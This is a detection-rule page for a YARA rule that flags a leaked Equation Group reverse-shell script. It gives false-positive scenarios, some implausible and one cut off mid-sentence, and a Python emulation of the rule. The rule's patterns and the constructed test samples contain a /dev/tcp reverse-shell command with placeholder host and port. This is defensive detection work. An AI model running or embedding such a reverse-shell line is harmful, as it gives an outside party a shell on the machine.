The reverse.shell.script file detected by this rule may indicate the presence of the Equation Group's hacking tools, which are associated with advanced persistent threats. SOC teams should proactively hunt for matches of this rule in Azure Sentinel to identify potential compromise and mitigate the risk of sophisticated cyber attacks.
YARA Rule
rule EquationGroup_reverse_shell {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file reverse.shell.script"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "d29aa24e6fb9e3b3d007847e1630635d6c70186a36c4ab95268d28aa12896826"
    strings:
        $s1 = "sh >/dev/tcp/" ascii
        $s2 = " <&1 2>&1" fullword ascii
    condition:
        ( filesize < 1KB and all of them )
}
This YARA rule can be deployed in the following contexts:
This rule contains two string patterns in its detection logic ($s1 and $s2); both must be present, and the file must be smaller than 1 KB, for the rule to fire.
Scenario: Legitimate System Administration Task
Description: A system administrator uses a script named reverse.shell.script as part of a legitimate maintenance task, such as remote server management or automated deployment.
Filter/Exclusion: Check for the presence of known admin tools (e.g., Ansible, Chef, Puppet) or scheduled job contexts (e.g., crontab, Task Scheduler) associated with the script.
Scenario: Scheduled Job for Log Rotation or Backup
Description: A scheduled job runs a script named reverse.shell.script to rotate logs or perform backups, which is a common administrative task.
Filter/Exclusion: Filter based on file location (e.g., /etc/cron.d/, /var/spool/cron/) or check for the presence of backup tools (e.g., rsync, tar, logrotate).
Scenario: Development Environment Testing
Description: A developer uses a script named reverse.shell.script in a test environment to simulate reverse shell behavior for security testing or training.
Filter/Exclusion: Check for the presence of testing frameworks (e.g., Metasploit, Kali Linux, OWASP ZAP) or environment markers (e.g., dev, test, staging).
Scenario: Malicious File Renamed by an Admin
Description: An attacker uploads a malicious file named reverse.shell.script, but an admin later renames it to appear as a legitimate script.
Filter/Exclusion: Check for file hashes against known malicious files or use a whitelist of trusted scripts based on file paths and ownership.
Scenario: Script Used for Remote Code Execution in CI/CD Pipeline
Description: A CI/CD pipeline uses a script named reverse.shell.script to execute commands on remote servers
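To make the rule's logic and the exclusion guidance above concrete, here is an added example (my own code, not part of the rule, of the signature-base project or of this page) that re-implements the two strings, the fullword modifier and the filesize condition in plain Python, runs them over a few constructed scripts, and then applies a path-plus-hash allowlist of the kind the scenarios describe. The fullword emulation follows how libyara treats ascii strings as I understand it (the byte immediately before and immediately after the match must not be alphanumeric); the allowlist format, the paths and the sample scripts are assumptions made for this example, and only the sha256 value is taken from the rule's meta section.

```python
"""Offline emulation of the EquationGroup_reverse_shell rule logic.

Added example; not the rule author's code. It mirrors the rule's two
strings, the fullword modifier and the 'filesize < 1KB' condition so the
rule can be reasoned about without a YARA install, then shows one way to
apply a hash/path allowlist during triage.
"""
import hashlib
import re

# Values taken from the rule on the page
KNOWN_BAD_SHA256 = "d29aa24e6fb9e3b3d007847e1630635d6c70186a36c4ab95268d28aa12896826"
MAX_SIZE = 1024             # 'filesize < 1KB'; YARA's KB multiplier is 1024
S1 = b"sh >/dev/tcp/"       # $s1: plain ascii substring
S2 = b" <&1 2>&1"           # $s2: ascii, fullword


def fullword_in(data: bytes, needle: bytes) -> bool:
    """Emulate YARA's fullword modifier for an ascii string: the match may
    not be directly preceded or followed by an alphanumeric byte."""
    pattern = rb"(?<![A-Za-z0-9])" + re.escape(needle) + rb"(?![A-Za-z0-9])"
    return re.search(pattern, data) is not None


def matched_strings(data: bytes) -> list:
    """Return the identifiers of the rule's strings found in data."""
    hits = []
    if S1 in data:
        hits.append("$s1")
    if fullword_in(data, S2):
        hits.append("$s2")
    return hits


def rule_matches(data: bytes) -> bool:
    """condition: ( filesize < 1KB and all of them )"""
    return len(data) < MAX_SIZE and len(matched_strings(data)) == 2


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def triage(path: str, data: bytes, trusted: dict) -> str:
    """Apply the exclusion guidance in a fixed order.

    'trusted' is a hypothetical allowlist of {path: sha256hex}. A known-bad
    hash is never excused; a rule hit is excused only when both the path and
    the content hash are on the allowlist, so a file swapped in at a trusted
    path still surfaces.
    """
    digest = sha256_hex(data)
    if digest == KNOWN_BAD_SHA256:
        return "known_bad_hash"
    if not rule_matches(data):
        return "no_match"
    if trusted.get(path) == digest:
        return "allowlisted"
    return "yara_match"


# Constructed samples for exercising the logic (not files from the leak)
SAMPLE_HIT = b"#!/bin/sh\nsh >/dev/tcp/${HOST}/${PORT} <&1 2>&1\n"
# Alphanumeric byte right before $s2 ('T' of PORT): fullword rejects $s2
SAMPLE_ALNUM_BEFORE = b"#!/bin/sh\nsh >/dev/tcp/HOST/PORT <&1 2>&1\n"
# Trailing '1' of $s2 followed by '0': fullword rejects $s2
SAMPLE_ALNUM_AFTER = b"#!/bin/sh\nsh >/dev/tcp/${HOST}/${PORT} <&1 2>&10\n"
# Both strings present but the file is padded past 1 KB
SAMPLE_TOO_BIG = SAMPLE_HIT + b"#" * 1100
# Ordinary admin script that only shares the '2>&1' redirection
SAMPLE_BENIGN = b"#!/bin/sh\nlogrotate /etc/logrotate.conf 2>&1\n"


if __name__ == "__main__":
    cases = [("hit", SAMPLE_HIT), ("alnum_before", SAMPLE_ALNUM_BEFORE),
             ("alnum_after", SAMPLE_ALNUM_AFTER), ("too_big", SAMPLE_TOO_BIG),
             ("benign", SAMPLE_BENIGN)]
    for name, blob in cases:
        print(f"{name:13s} strings={matched_strings(blob)} fires={rule_matches(blob)}")
    print(triage("/opt/maint/reverse.shell.script", SAMPLE_HIT, {}))
```

Running the block shows how narrow the rule is: the padded copy and the copies with an alphanumeric byte on either side of $s2 do not fire even though the redirection is there, which is worth knowing before relying on this rule alone for hunting. The triage function deliberately tests the known-bad hash before anything else, so an allowlisted path can never excuse the leaked file itself.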